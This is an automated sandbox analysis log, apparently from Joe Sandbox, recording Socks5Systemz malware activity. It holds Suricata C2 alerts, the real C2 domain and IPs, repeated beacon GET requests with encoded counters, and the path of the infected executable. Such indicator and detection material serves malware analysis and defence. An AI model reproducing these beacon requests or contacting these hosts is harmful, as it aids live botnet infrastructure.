                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49861 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49861 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49876 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49792 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49876 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49834 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49834 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49844 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49792 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49865 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49865 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49887 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49887 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49905 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49905 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49909 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49909 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49839 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49839 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49895 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49895 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49923 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49923 -> 94.232.249.187:80
                  Source: Malware configuration extractorURLs: bwiesit.com
                  Source: global trafficTCP traffic: 192.168.2.4:49915 -> 46.8.225.74:2023
                  Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownUDP traffic detected without corresponding DNS query: 45.155.250.90
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C22B95 WSASetLastError,WSARecv,WSASetLastError,select,6_2_02C22B95
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
